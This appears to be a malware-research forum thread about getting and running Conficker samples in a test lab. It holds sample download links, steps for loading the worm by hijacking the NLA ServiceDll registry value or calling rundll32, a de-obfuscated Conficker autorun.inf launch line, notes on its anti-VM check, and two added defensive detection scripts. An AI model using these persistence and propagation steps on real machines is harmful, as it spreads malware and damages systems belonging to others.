Sample Request for Conficker Version C
Can anyone help me find a copy of Conficker version C? I'm looking for the latest version with the new Domain Generation Algorithm and P2P capabilities. Any help would be greatly appreciated.
This is the b++ variant, which I already obtained from the DB. I'm looking for the C variant. Thanks though!
That's MS classified C, so if you're looking for MS D that would be a different file for sure.
Symantec would call this one B or B++, and the one that you're looking for is their classified C version, I suspect.
F**king names make me sick anyway; will dig back, I've got a few Ds lying around here somewhere.
Names Suck
http://www.offensivecomputing.net/?q=ocsearch&ocq=5e279ef7fcb58f841199e0ff55cdea8b
http://www.virustotal.com/analisis/1b8557969145f32854ee8b4b04e6d64f
Microsoft 1.4502 2009.03.26 Worm:Win32/Conficker.D
Symantec 1.4.4.12 2009.03.26 W32.Downadup.C
Hell...Sophos is so badass they are several series ahead of everybody. ;)
Sophos 4.40.0 2009.03.26 W32/Confick-G
Running the sample
Thanks for the sample! Have you managed to make it run? Care to share your experience? :D
Cheesy Ways
Hmmmmm.....
You can be a cheesy one like me and use a non-critical service your test machine isn't really using, that also uses netsvc.
For instance, I use Nla and changed the ServiceDll pointer in the registry to point at my fick file. :)
Heh!...it worked too.
Also, I hear it's best not to use the .dll extension, use something else; otherwise, I wouldn't want to discuss much more about it out in public.
Thanks for the sample. This is exactly what I've been looking for!
Glad it helps ;)
Have fun playing; kills snot outa some tools I use a lot, no more TCPView unless renamed, same with Wireshark and some others. :(
how does it work?
Hi,
I got the binary, saved it as a .dll and modified the ServiceDll for NLA, and I am seeing an error saying "DLL init routine failed". Is the sample not supposed to be in DLL format? Any info will be helpful.
-D
Heh
I haven't a clue how you went about things, but it sounds like you're on the right track.
I just made the shit up as I went along; I couldn't find a 40 oz. in a wet paper bag usually. ;)
I did notice it takes some minutes after boot to begin to visibly see the traffic; then of course you'll need some of the network hackables in order for it to spread.
Otherwise, just rename TCPView or the Wireshark executable and watch the traffic as it increases.
DLL fails to load
Thanks, it feels good to know I am moving in the right direction!
I slightly modified the process of inserting Conficker. I followed the method described in http://mtc.sri.com/Conficker/
Saved the Conficker variant given in this link as malware.dll in the system32 folder. Modified the NLA ServiceDll path to my malware.dll. Rebooted the system. Went into services.msc and restarted Network Location Awareness. The service doesn't load the DLL and I am seeing the error "A dynamic link library (DLL) initialization routine failed". Am I supposed to rename it to .dll? Is this the right version of Conficker? Can someone please give me a working version?
Thanks
-D
That should have done it. A good way to test is to copy and rename notepad.exe to procexp.exe (one of the Conficker blacklisted executable names) and run it. It should run, then quickly exit. If it does, then you're infected. Also, try and visit www.microsoft.com (if you're not behind a proxy). If you can't, again, infected.
Securing VMware
Hey
I have got a few samples of Conficker, but my question is how to make an initial setup of VMware secure, i.e. to protect my HOST PC from the GUEST PC(s)' infection being spread over, if the worm has anti-virtualization/anti-VMware techniques to jump over network nodes.
divyagaru....you are probably not being patient enough. I've done exactly what you're doing and was able to see traffic within a 5 to 10 minute period.
Why do I have no version in my VirusTotal:
http://www.virustotal.com/analisis/668e45756c9f42e057149c3fa6def638
Version Last Update Result
a-squared - - Net-Worm.Win32.Kido!IK
AhnLab-V3 - - Win32/Conficker.worm.88576
AntiVir - - Worm/Conficker.D.1
as you:
http://www.virustotal.com/analisis/1b8557969145f32854ee8b4b04e6d64f
a-squared 4.0.0.101 2009.03.26 Net-Worm.Win32.Kido!IK
AhnLab-V3 5.0.0.2 2009.03.26 Win32/Conficker.worm.88576
AntiVir 7.9.0.129 2009.03.26 Worm/Conficker.D.1
???
thx
Hi,
You may be right that I am not patient enough, but unless the DLL loads successfully, I will not be able to see the traffic at regular intervals. So my question is, do you also see the failed-to-load-the-DLL message? Meaning, are you receiving the error "DLL init routine failed"? If not, then I request you to please provide me the working version of the binary.
-D
Yeah, I get both error messages when I run the binary using this cheesy method, but also if I wait about 15 minutes after trying to manually launch the service, I'll start seeing things like:
Process Explorer dies and disappears, TCPView just disappears, GMER won't run unless renamed, Wireshark won't run unless renamed; these are just telltale signs I know the infection is running.
There is obviously an injection method they use but I have no idea what it is for now.
Good Luck.
I didn't receive the error messages; however, ProcExp died and Wireshark won't run unless renamed. You guys say that you can see network traffic within about 15 minutes. What type of traffic should I expect to see?
Thank you guys for confirming. Would one of you please send me the dll copy you have? divyagaru@yahoo.com
Not working for me either...any ideas?
Followed the following steps:
1. Set up a new Win XP SP2 machine, no updates.
2. Downloaded: http://www.offensivecomputing.net/?q=ocsearch&ocq=5e279ef7fcb58f841199e0ff55cdea8b
3. Renamed the file to malware.dll
4. Copied the file to c:\WINDOWS\system32\
5. Modified the registry parameter for NLA to c:\WINDOWS\system32\malware.dll
6. Rebooted
On reboot, I receive "Error 126: The specified module could not be found" in the event viewer, from the Service Control Manager.
If I try and start the NLA service, I receive Error 126 above.
I have been monitoring traffic for over 2 hours from another machine and nothing.
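An added defender's audit for the persistence path these steps rely on (not code from the thread or from any of its posters): it parses `reg query` output for the ServiceDll values of svchost-hosted services and flags any value that differs from a known-good baseline or is not even a .dll. The sample output and the XP baseline map are constructed assumptions, as is the choice of the three services.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample of `reg query HKLM\SYSTEM\CurrentControlSet\Services /s`
# output trimmed to the ServiceDll values (not captured from a real host).
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Nla\Parameters
    ServiceDll    REG_EXPAND_SZ    C:\WINDOWS\system32\malware.dll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Browser\Parameters
    ServiceDll    REG_EXPAND_SZ    %SystemRoot%\System32\browser.dll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netman\Parameters
    ServiceDll    REG_EXPAND_SZ    %SystemRoot%\System32\jwgkvsq.vmx
"""

# Assumed known-good XP ServiceDll basenames (take these from a clean reference image in practice).
BASELINE = {"nla": "mswsock.dll", "browser": "browser.dll", "netman": "netman.dll"}

KEY_RE = re.compile(r"^HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\([^\\]+)\\Parameters$", re.I)
VAL_RE = re.compile(r"^\s+ServiceDll\s+REG_(?:EXPAND_)?SZ\s+(.+?)$", re.I)

def parse_servicedlls(text):
    """Map lowercase service name -> ServiceDll path from reg query output."""
    result, current = {}, None
    for line in text.splitlines():
        line = line.rstrip()
        key = KEY_RE.match(line)
        if key:
            current = key.group(1).lower()
            continue
        val = VAL_RE.match(line)
        if val and current:
            result[current] = val.group(1)
    return result

def audit(servicedlls, baseline=BASELINE):
    """Return (service, path, reason) for each ServiceDll off-baseline or not a .dll."""
    findings = []
    for svc, path in servicedlls.items():
        name = PureWindowsPath(path).name.lower()
        reasons = []
        if svc in baseline and name != baseline[svc]:
            reasons.append(f"expected {baseline[svc]}")
        if not name.endswith(".dll"):
            reasons.append("non-.dll extension")
        if reasons:
            findings.append((svc, path, "; ".join(reasons)))
    return findings

for svc, path, why in audit(parse_servicedlls(SAMPLE_REG_OUTPUT)):
    print(f"{svc}: {path} ({why})")
```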
I had a similar experience; however, I receive error 32:
"Could not start the Network Location Awareness (NLA) service on Local Computer. Error 32: The process cannot access the file because it is being used by another process."
I renamed Process Explorer and opened it. Searched for malware.dll, and the handle shows up under svchost.exe.
I still don't see much network traffic.
http://img23.imageshack.us/img23/7475/confickerc.jpg
Anti-debug
This worm has some sort of anti-debug policy, so I guess that's why I can't make it run in a VM. And instead of playing with services manually, why not just use: RUNDLL32.EXE malware.dll ?
To Conduit: try this as Parameters: %SystemRoot%\system32\malware.dll
To divyagaru: this is not a crack that you're looking for another version of. This is the only version; look at the MD5, SHA1, SHA256....
Thanks, I tried that originally, actually.
The rundll32.exe bit does not work because you need to also specify the entry routine in the dll. I was able to infect a blank USB drive with Conficker.B using rundll32 confickerb , . Then I used that drive to infect my lab machines.
To your statement about anti-debug, the answer is yes. There is a specific check for VMs. During execution, Conficker stores the Local Descriptor Table in a register that is then compared with certain values (namely 0). This allows Conficker to detect if it's running in a virtual machine – the LDT of a native system will be 0x0000, while in VMware (or VirtualPC) the LDT will be relocated (for example, in VMware 4 it will often be 0x4058).
Hope this helps,
Rob
Thanks
Thanks for your useful reply. About your first paragraph, this is the exact method that autorun.inf is using to infect computers, although if you look at it, it seems unreadable, but most of it is garbage and will be ignored (this is the nastiest autorun I've ever seen; it's even using control characters to manipulate the final result, and it's dynamic, which means an active virus would change it with dummy bytes in order to fool anti-viruses). Anyway, after cleaning autorun.inf, you'll end up with something like this:
[AUTorUN]
icon=%syStEmrOot%\sySTEM32\sHELL32.Dll,4
shelLExECUte=RuNdLl32.EXE .\RECYCLER\S-x-x-xx-2819952290-8240758988-879315005-xxxx\jwgkvsq.vmx,ahaezedrn
useAuTopLAY=1
As you see, you can use rundll32 with that parameter. (You should not use the .dll extension for this file, otherwise the virus would think it's already installed and will exit; my advice, use that exact file name.)
About your second paragraph, yes, it seems you're right. The malware is using anti-VM, and it's nearly impossible to fool all the VM detection systems around just by manipulating your guest OS:
http://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf
The best way would be unpacking the malware and patching the anti-debug instead of changing the settings and hoping for a miracle.
And can you please verify this?:
CRC32: 32D4ED93
MD5: 5E279EF7FCB58F841199E0FF55CDEA8B
SHA-1: 97256A110C2D1910278F057034B5716448DC04E8
SHA-512: 97B4DB923FE26C1AE2F9E0896D55878078D6067348EDCF488DD0A2A1143B99F146501824807F29C9260A1D6F31D75244CB6BED478B35446CB691C6B8D72B034C
(And would you please upload the malware (the one on your infected USB) for us, if it has different hashes of course?)
Thanks
Best regards
Hamy
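An added example from the analyst's side (not code from Hamy or anyone else in the thread): a normaliser for an autorun.inf padded the way the post above describes, which strips non-printable bytes and junk lines, case-folds the directives so they read like the cleaned listing, and then flags the rundll32-on-a-non-.dll / RECYCLER launch pattern. The sample input is constructed, and the SID in the path is a placeholder.

```python
import re

# Constructed sample in the spirit of the padded autorun.inf described above:
# junk lines and control bytes around the real directives, mixed case, and a
# placeholder SID path. Nothing here is copied from an actual sample.
SAMPLE_AUTORUN = (
    b"\x00\x01zzzz padding line without an equals sign\r\n"
    b"[AUTorUN]\r\n"
    b"\x07\x1b more padding that the INI reader ignores\r\n"
    b"icon=%syStEmrOot%\\sySTEM32\\sHELL32.Dll,4\r\n"
    b"shelLExECUte=RuNdLl32.EXE .\\RECYCLER\\S-x-x-xx-PLACEHOLDER\\jwgkvsq.vmx,ahaezedrn\r\n"
    b"useAuTopLAY=1\r\n"
)

SECTION_RE = re.compile(r"^\[(.+?)\]$")
KV_RE = re.compile(r"^([^=]+?)\s*=\s*(.*)$")

def normalize(raw):
    """Drop non-printable bytes and non key=value lines; case-fold sections and keys."""
    text = raw.decode("latin-1")
    text = "".join(ch for ch in text if ch.isprintable() or ch in "\r\n")
    cfg, section = {}, None
    for line in text.splitlines():
        line = line.strip()
        sec = SECTION_RE.match(line)
        if sec:
            section = sec.group(1).lower()
            cfg.setdefault(section, {})
            continue
        kv = KV_RE.match(line)
        if kv and section is not None:
            cfg[section][kv.group(1).strip().lower()] = kv.group(2).strip()
    return cfg

def suspicious_directives(cfg):
    """Flag [autorun] launch lines handing rundll32 a non-.dll file or a RECYCLER path."""
    hits = []
    for key in ("shellexecute", "open", "shell\\open\\command"):
        value = cfg.get("autorun", {}).get(key, "").lower()
        if not value:
            continue
        parts = value.split(None, 1)  # launcher, then its argument string
        target = parts[1].split(",")[0] if len(parts) > 1 else ""
        if "rundll32" in parts[0] and not target.endswith(".dll"):
            hits.append((key, "rundll32 loading a non-.dll file"))
        if "\\recycler\\" in value:
            hits.append((key, "target under RECYCLER"))
    return hits

print(suspicious_directives(normalize(SAMPLE_AUTORUN)))
```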
How do I register the parameter for NLA?
In the registry, what do I fix to enroll malware.dll?
I don't know the registry very well.

http://www.offensivecomputing.net/?q=ocsearch&ocq=38c3d2efdd47b1034b1624490ce1f3f2